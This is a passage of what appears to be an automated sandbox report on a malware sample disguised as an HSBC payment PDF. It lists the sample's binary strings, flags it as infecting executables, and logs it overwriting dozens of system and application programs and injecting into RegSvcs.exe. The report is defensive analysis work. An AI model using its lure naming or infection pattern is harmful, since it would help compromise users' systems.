              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1904523018.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000004.00000003.1875324532.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdbGCTL source: vds.exe.4.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.4.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4B841h5_2_00B4B590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4C212h5_2_00B4BDF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4F4A2h5_2_00B4F1F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4C212h5_2_00B4C13F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4E798h5_2_00B4E4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4FA30h5_2_00B4F788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4EBF0h5_2_00B4E948
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4F048h5_2_00B4EDA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B4C212h5_2_00B4BDE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6969Dh5_2_05D69360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6D828h5_2_05D6D580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D68051h5_2_05D67DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6C010h5_2_05D6BD68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6B760h5_2_05D6B4B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6AEB0h5_2_05D6AC08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6F238h5_2_05D6EF90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6AA58h5_2_05D6A7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D691B1h5_2_05D68F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6E988h5_2_05D6E6E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D68901h5_2_05D68658
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6E0D8h5_2_05D6DE30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6DC80h5_2_05D6D9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6BBB8h5_2_05D6B910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6D3D0h5_2_05D6D128
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6FAE8h5_2_05D6F840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6B308h5_2_05D6B060
